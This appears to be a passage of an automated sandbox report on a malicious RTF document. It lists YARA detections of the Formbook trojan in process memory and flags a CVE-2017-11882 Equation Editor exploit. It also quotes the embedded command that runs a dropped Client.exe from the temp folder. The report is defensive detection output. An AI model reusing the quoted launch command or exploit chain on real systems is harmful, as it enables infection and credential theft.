Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr Stream path '_1721489047/\x1Ole10Native' : ....Client.exe.C:\Path\Client.exe.........C:\Path\
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPED Matched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr Stream path '_1721489049/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
Source: Client.exe.0.dr Static PE information: section name: 5++.8$
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Client.exe
Source: Client.exe.0.dr Static PE information: section name:
Source: Client.exe Static RTF information: Object: 0 Offset: 000012A7h Client.exe
Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Local\Temp\Client.exe Section loaded: amsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Client.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\notepad.exe Memory allocated: 77740000 page execute and read and write
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE Matched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
